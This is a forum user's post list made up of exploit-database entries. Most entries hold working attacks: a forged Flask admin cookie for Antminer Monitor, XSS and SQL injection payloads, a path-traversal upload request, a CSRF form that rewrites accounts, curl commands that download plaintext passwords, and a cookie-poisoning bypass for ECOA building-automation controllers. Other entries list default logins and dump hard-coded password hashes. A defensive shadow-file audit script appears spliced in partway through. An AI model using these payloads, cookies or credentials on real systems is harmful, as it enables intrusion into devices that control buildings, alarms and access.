HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass
     # Date: 09/06/2021
     # Dork: https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22
     # Exploit Author: CQR.company / Vulnz.
     # Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
     # Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/
     # Version: 0.5.0
     # Tested on: Windows, Linux, macOS

     The software is commonly used for monitoring Antminers and can easily be found on ZoomEye (800) and Shodan (500). For now this is the most popular Antminer monitoring tool.

     The vulnerability in Antminer Monitor exists because of a backdoor or misconfiguration made by the developer inside the settings file of the Flask server. The settings file has a predefined secret string, which should be randomly generated; however, it is static in this build:
     https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

     The secret key is 'super secret key'. Based on this information we can craft authorization bypass cookies. Using the flask-unsign tool we can generate a cookie which will provide you admin access:

     flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"

     Additionally, you can use this universal cookie to access the web interface of the Flask application. This cookie works on all systems in the "session" field:

     .eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

     In addition, DEBUG = True, which means /console works; however, it needs a PIN.
  2. # Exploit Title: Active WebCam 11.5 - Unquoted Service Path
     # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
     # Date: 09.09.2021
     # Software Link: https://www.techspot.com/downloads/175-active-webcam.html
     # Vendor Homepage: https://www.pysoft.com/
     # Version: 11.5
     # Tested on: Windows 10
     # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options

     # Proof of Concept:

     C:\Users\death>sc qc ACTIVEWEBCAM
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: ACTIVEWEBCAM
             TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\Active WebCam\WebCam.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Active WebCam
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
     Active WebCam    ACTIVEWEBCAM    C:\Program Files\Active WebCam\WebCam.exe    Auto
  3. # Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
     # Date: 2021-09-08
     # Exploit Author: Emre Aslan
     # Vendor Homepage: https://phpgurukul.com/
     # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
     # Version: 1.0
     # Tested on: Windows 11 - XAMPP Server
     # Vulnerable page: host/admin/*
     # Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div>
     # Vulnerable Parameter: adminname [ POST Data ]
     # Tested Payload: <svg/onload=alert('XSS')>

     # Proof Of Concept:
     # 1 - Log in to the dashboard
     # 2 - Go to /admin/admin-profile.php
     # 3 - Set the admin name to the payload
     # 4 - The XSS fires
  4. # Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload
     # Date: 25.06.2021
     # Exploit Author: Neurogenesia
     # Vendor Homepage: http://www.ecoa.com.tw

     ECOA Building Automation System Path Traversal Arbitrary File Upload

     Vendor: ECOA Technologies Corp.
     Product web page: http://www.ecoa.com.tw
     Affected version:
       ECOA ECS Router Controller - ECS (FLASH)
       ECOA RiskBuster Terminator - E6L45
       ECOA RiskBuster System - RB 3.0.0
       ECOA RiskBuster System - TRANE 1.0
       ECOA Graphic Control Software
       ECOA SmartHome II - E9246
       ECOA RiskTerminator

     Summary:

     #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers suited to the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practices a web-based concept with simple and convenient operation, totally sharing risk and making sure of security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols like XML, Modbus TCP/IP, BACnet or URL.

     #2 The RiskBuster is a web-enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor-based equipment or systems in buildings.

     The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve the management and audit trail capabilities of building controllers and microprocessor-based equipment or systems. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor-based equipment or systems without any need for major upgrades or equipment replacement, and allows cost saving. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor-based equipment or systems to allow full building control. The RiskBuster provides a truly cost-effective solution for any building automation or high-level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

     #3 The ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

     #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls directly across the Internet. The ECS0000160 can totally replace and improve a typical system that always has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, not just when connected with a singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation, which works based on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with options of RS485.

     #5 HOME SERVER-EHC9246150 - This web-based home server is specified for hidden installation, with a 32-bit microcomputer and I/O peripheral expansion circuit, which includes: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features include the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, for premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

     Desc: The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location and content type and gain the possibility to execute arbitrary code on the affected device.

     Tested on:
       EMBED/1.0
       Apache Tomcat/6.0.44
       Apache Tomcat/6.0.18
       Windows Server
       MySQL Version 5.1.60
       MySQL Version 4.0.16
       Version 2.0.1.28 20180628

     Vulnerability discovered by Neurogenesia @zeroscience

     Advisory ID: ZSL-2021-5669
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php

     25.06.2021

     --

     Directory Traversal / File Path Traversal / Unrestricted File Upload
     --------------------------------------------------------------------

     - Abusing the 'filename' and 'rbt' POST parameters, an attacker can navigate outside the current directory and write files to arbitrary locations.
     - There is no validation of file content, file extension or file location.

     Request:

     POST /ebd-bin/upload HTTP/1.1
     Host: 192.168.1.3:8080

     ------WebKitFormBoundaryvxy2zFDs1Z69pfRB
     Content-Disposition: form-data; name="rbt"

     ecsfile
     ------WebKitFormBoundaryvxy2zFDs1Z69pfRB
     Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext"
     Content-Type: application/octet-stream

     ANY_CONTENT_HERE
     ------WebKitFormBoundaryvxy2zFDs1Z69pfRB--
  5. # Exploit Title: ECOA Building Automation System - Weak Default Credentials
     # Date: 25.06.2021
     # Exploit Author: Neurogenesia
     # Vendor Homepage: http://www.ecoa.com.tw

     ECOA Building Automation System Weak Default Credentials

     Vendor: ECOA Technologies Corp.
     Product web page: http://www.ecoa.com.tw
     Affected version:
       ECOA ECS Router Controller - ECS (FLASH)
       ECOA RiskBuster Terminator - E6L45
       ECOA RiskBuster System - RB 3.0.0
       ECOA RiskBuster System - TRANE 1.0
       ECOA Graphic Control Software
       ECOA SmartHome II - E9246
       ECOA RiskTerminator

     Summary: (the product summary #1-#5 is identical to the one in entry 4 above)

     Desc: The BAS controller uses a weak set of default administrative credentials that can be easily guessed in remote password attacks to gain full control of the system.

     Tested on:
       EMBED/1.0
       Apache Tomcat/6.0.44
       Apache Tomcat/6.0.18
       Windows Server
       MySQL Version 5.1.60
       MySQL Version 4.0.16
       Version 2.0.1.28 20180628

     Vulnerability discovered by Neurogenesia @zeroscience

     Advisory ID: ZSL-2021-5668
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php

     25.06.2021

     --

     Default / Weak Credentials
     --------------------------

     - An attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System.

     Credentials:
       guest:guest
       user:user
       admin:admin
       root:embed
       embed:power
       administrator:empty
       humex:humex4377
       ecoa:ecoa4377
  6. # Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
     # Date: 2021-09-09
     # Exploit Author: Aryan Chehreghani
     # Vendor Homepage: https://phpgurukul.com
     # Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
     # Version: 1.0
     # Tested on: Windows 10 - XAMPP Server
     # Vulnerable page: http://localhost/msms/admin/edit-customer-detailed.php?editid=

     # Proof Of Concept:
     # 1. Download and install [ Men Salon Management System ]
     # 2. Go to /msms/admin/index.php and enter the username & password
     # 3. Navigate to >> Customer List
     # 4. In the action column, click Edit
     # 5. Enter the payload into the URL and fields

     # [ SQL Injection ]:
     Vulnerable parameter: the editid parameter is vulnerable to SQLi
     GET: http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+

     # [ Stored Cross-Site Scripting ]:
     Vulnerable fields: Name & Email
     Payload used: "><script>alert(document.cookie)</script>
  7. # Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
     # Date: 25.06.2021
     # Exploit Author: Neurogenesia
     # Vendor Homepage: http://www.ecoa.com.tw

     ECOA Building Automation System Cross-Site Request Forgery

     Vendor: ECOA Technologies Corp.
     Product web page: http://www.ecoa.com.tw
     Affected version:
       ECOA ECS Router Controller - ECS (FLASH)
       ECOA RiskBuster Terminator - E6L45
       ECOA RiskBuster System - RB 3.0.0
       ECOA RiskBuster System - TRANE 1.0
       ECOA Graphic Control Software
       ECOA SmartHome II - E9246
       ECOA RiskTerminator

     Summary: (the product summary #1-#5 is identical to the one in entry 4 above)

     Desc: The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform any CRUD operation like user creation, alarm shutdown and account password change with administrative privileges if a logged-in user visits a malicious web site.

     Tested on:
       EMBED/1.0
       Apache Tomcat/6.0.44
       Apache Tomcat/6.0.18
       Windows Server
       MySQL Version 5.1.60
       MySQL Version 4.0.16
       Version 2.0.1.28 20180628

     Vulnerability discovered by Neurogenesia @zeroscience

     Advisory ID: ZSL-2021-5671
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php

     25.06.2021

     --

     Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm
     ----------------------------------------------------------------------

     - CSRF exists in the entire solution for any CRUD operation.

     PoC:

     <html>
       <body>
         <form action="http://192.168.1.3:8080/usersave" method="POST">
           <input type="hidden" name="bk" value="&#45;1" />
           <input type="hidden" name="edtText" value="" />
           <input type="hidden" name="comText" value="19" />
           <input type="hidden" name="delrow" value="" />
           <input type="hidden" name="hiddenText" value="user&#1;user&#1;19&#1;&#1;&#2;guest&#1;guest&#1;10&#1;&#1;&#2;root&#1;embed&#1;19&#1;&#1;&#2;admin&#1;admin&#1;19&#1;&#1;&#2;" />
           <input type="submit" value="Submit" />
         </form>
       </body>
     </html>
  8. # Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure
     # Date: 25.06.2021
     # Exploit Author: Neurogenesia
     # Vendor Homepage: http://www.ecoa.com.tw

     ECOA Building Automation System Directory Traversal Content Disclosure

     Vendor: ECOA Technologies Corp.
     Product web page: http://www.ecoa.com.tw
     Affected version:
       ECOA ECS Router Controller - ECS (FLASH)
       ECOA RiskBuster Terminator - E6L45
       ECOA RiskBuster System - RB 3.0.0
       ECOA RiskBuster System - TRANE 1.0
       ECOA Graphic Control Software
       ECOA SmartHome II - E9246
       ECOA RiskTerminator

     Summary: (the product summary #1-#5 is identical to the one in entry 4 above)

     Desc: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the affected device.

     Tested on:
       EMBED/1.0
       Apache Tomcat/6.0.44
       Apache Tomcat/6.0.18
       Windows Server
       MySQL Version 5.1.60
       MySQL Version 4.0.16
       Version 2.0.1.28 20180628

     Vulnerability discovered by Neurogenesia @zeroscience

     Advisory ID: ZSL-2021-5670
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php

     25.06.2021

     --

     Directory Traversal Content Disclosure
     --------------------------------------

     - Abusing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks.
       - cpath=.
       - cpath=../../../../../../../etc

     Request:

     GET /fmangersub?cpath=/ HTTP/1.1
     Host: 192.168.1.3:8080

     Response (directory listing):

     bacevent.elf  redown.elf  system.bin  webnewc.elf  err.txt  hole.elf
     modbustcp.elf  ianplc.bin  hitachi.el  bacser.elf  root.pem  pwsd.bin
     server.lst  symtbl.tbl  client.pem  gb-unicode.bin  httpser.elf  namelst.bin
     AI.tbl  BI.tbl  AV.tbl  BV.tbl  mstplalf  rthost.elf  big5-unicode.bin
     version.bin  modbus.elf  rbdev.bin  rbdlc.elf  powercrd.elf
  9. # Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access
     # Date: 25.06.2021
     # Exploit Author: Neurogenesia
     # Vendor Homepage: http://www.ecoa.com.tw

     ECOA Building Automation System Hard-coded Credentials SSH Access

     Vendor: ECOA Technologies Corp.
     Product web page: http://www.ecoa.com.tw
     Affected version:
       ECOA ECS Router Controller - ECS (FLASH)
       ECOA RiskBuster Terminator - E6L45
       ECOA RiskBuster System - RB 3.0.0
       ECOA RiskBuster System - TRANE 1.0
       ECOA Graphic Control Software
       ECOA SmartHome II - E9246
       ECOA RiskTerminator

     Summary: (the product summary #1-#5 is identical to the one in entry 4 above)

     Desc: The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end user and cannot be changed through any normal operation of the device.

     Tested on:
       EMBED/1.0
       Apache Tomcat/6.0.44
       Apache Tomcat/6.0.18
       Windows Server
       MySQL Version 5.1.60
       MySQL Version 4.0.16
       Version 2.0.1.28 20180628

     Vulnerability discovered by Neurogenesia @zeroscience

     Advisory ID: ZSL-2021-5675
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php

     25.06.2021

     --

     Hard-coded Credentials / Remote SSH Access
     ------------------------------------------

     - Exercise for the nation-state actors and actresses.
root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7::: user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7::: webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0::::::: admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0::::::: ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7::: humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7::: guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7:::
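As an added defender-side example (not part of the advisory above and not vendor code), the following Python audits an /etc/shadow file pulled out of a firmware image for exactly the conditions the listing above exhibits: accounts with a usable password hash, the legacy md5crypt ($1$) scheme, empty or negative last-change fields, and hashes that are identical to a reference factory image, which is the signature of a credential baked into every unit rather than set per device. The sample shadow text and the known_factory_hashes set are constructed placeholders with the same field layout, not the device's real values; all function and constant names are the example's own.

```python
"""Audit an /etc/shadow extracted from a firmware image (added example)."""

# Constructed sample in the same 9-field layout as the advisory's listing.
# Hash strings are placeholders, not real device values.
SAMPLE_SHADOW = """\
root:$1$saltsalt$aaaaaaaaaaaaaaaaaaaaaa:16183:0:99999:7:::
webs:$1$saltsalt$bbbbbbbbbbbbbbbbbbbbbb:::::::
ecoa:$1$saltsalt$cccccccccccccccccccccc:-5835:0:99999:7:::
admin:$6$saltsaltsaltsalt$dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd:18000:0:99999:7:::
svc:*:18000:0:99999:7:::
locked:!:18000:0:99999:7:::
"""

# crypt(3) scheme identifiers; md5crypt is fast enough to brute-force offline.
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}
WEAK_SCHEMES = {"md5crypt"}


def parse_shadow(text):
    """Return one dict per account with the fields this audit needs."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) < 8:
            raise ValueError("malformed shadow line: %r" % raw)
        entries.append({"user": fields[0], "hash": fields[1], "lastchange": fields[2]})
    return entries


def scheme_of(h):
    for prefix, name in HASH_SCHEMES.items():
        if h.startswith(prefix):
            return name
    return "unknown/descrypt"


def is_login_capable(h):
    # '*' or anything starting with '!' means the account has no password login.
    return h != "*" and not h.startswith("!")


def audit(text, known_factory_hashes=frozenset()):
    """Return (user, issue) pairs for every account that can authenticate by password."""
    issues = []
    for e in parse_shadow(text):
        user, h, lc = e["user"], e["hash"], e["lastchange"]
        if not is_login_capable(h):
            continue
        if h == "":
            issues.append((user, "empty password field: login without any password"))
            continue
        issues.append((user, "login-capable password hash present in image"))
        sch = scheme_of(h)
        if sch in WEAK_SCHEMES:
            issues.append((user, "weak hash scheme %s (fast to brute-force offline)" % sch))
        if h in known_factory_hashes:
            # Same hash on every unit: the credential is hard-coded, not per-device.
            issues.append((user, "hash identical to factory image: hard-coded credential"))
        if lc == "":
            issues.append((user, "empty lastchange: password aging never applied"))
        elif lc.lstrip("-").isdigit() and int(lc) < 0:
            issues.append((user, "negative lastchange: field forged or clock invalid"))
    return issues


if __name__ == "__main__":
    factory = {"$1$saltsalt$aaaaaaaaaaaaaaaaaaaaaa"}  # constructed reference set
    for user, issue in audit(SAMPLE_SHADOW, factory):
        print("%-8s %s" % (user, issue))
```

Run it against a shadow file carved from the image (for example with binwalk) and against the same file from a second unit: any hash that matches across units lands in the "hard-coded credential" bucket, which is the finding that cannot be fixed by the end user and needs a vendor firmware change.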
10. # Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Configuration Download Information Disclosure

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers on the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows the basic Web concept of simple and convenient operation, sharing risk and ensuring security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols such as XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve the management and audit trail capabilities of building controllers and microprocessor based equipment or systems. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipment or systems without any need for major upgrades or equipment replacement, and allows cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and not only from a single specific operating system. It is a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation based on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web based home server is specified for hidden installation, with a 32-bit microcomputer and I/O peripheral expansion circuit, which includes a D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, in premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller is vulnerable to configuration disclosure when a direct object reference is made to the syspara.dat or images.dat files using an HTTP GET request. This enables the attacker to disclose sensitive information and helps her in authentication bypass, privilege escalation and full system access.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia @zeroscience

Advisory ID: ZSL-2021-5673
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php

25.06.2021

--

Configuration / Backup Download / Privilege Escalation / Password Disclosure
----------------------------------------------------------------------------

- Unauthenticated config download reveals plain-text passwords

$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat
$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat
$ strings *
...
...
/opt/webpage/pwsd.bin
/user
user
embed
power
1234
1234
/opt/webpage/system.bin
Oboothr=24
bootmin=00
OutIDWork=Y
language=big5
seclanguage=Y
ValSet=Y
allpollTm=500
httpusr=embed
httppwd=power
...
...
11. # Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Cookie Poisoning Authentication Bypass

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers on the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows the basic Web concept of simple and convenient operation, sharing risk and ensuring security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols such as XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve the management and audit trail capabilities of building controllers and microprocessor based equipment or systems. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipment or systems without any need for major upgrades or equipment replacement, and allows cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and not only from a single specific operating system. It is a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation based on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web based home server is specified for hidden installation, with a 32-bit microcomputer and I/O peripheral expansion circuit, which includes a D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, in premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker can, through cookie poisoning, bypass authentication, disclose sensitive information, circumvent physical access controls in smart homes and buildings, and manipulate HVAC.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia @zeroscience

Advisory ID: ZSL-2021-5672
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php

25.06.2021

--

Authentication Bypass
---------------------

- Authentication bypass happens by modifying the Cookie values.
- Setting the UCLS Cookie larger than or equal to 19 bypasses security controls.

Request:

GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1
Host: 192.168.1.3:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
12. Weblogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271) ----- Backlion

0x01 Vulnerability description

Recently, attackers have been using the WebLogic deserialization vulnerability CVE-2017-3248 and the WebLogic WLS component remote code execution vulnerability CVE-2017-10271. Oracle officially released a patch for the vulnerability in October 2017 but did not disclose its details. A company that does not install the patch in time is at risk of being attacked. Large-scale remote attacks have been launched against enterprise servers, posing a serious threat to many of them.

Affected versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0

0x02 Attack procedure

After the attacker selects a target host, he first uses CVE-2017-3248 against it. Regardless of whether that succeeds, he then attacks with CVE-2017-10271. In each attack, Windows systems are targeted first, then Linux systems. The specific process is as follows:

1. Use the WebLogic deserialization vulnerability (CVE-2017-3248) to call wget on Linux to download a shell script, then call the local Linux "/bin/bash" to execute it. (The shell script defines the control details from the remote download through to running the mining program.)
2. Use the WebLogic deserialization vulnerability (CVE-2017-3248) to call PowerShell on Windows to download and execute the sample.
3. Use the WebLogic WLS component vulnerability (CVE-2017-10271) to call wget on Linux to download a shell script, then call the local Linux "/bin/bash" to execute it.
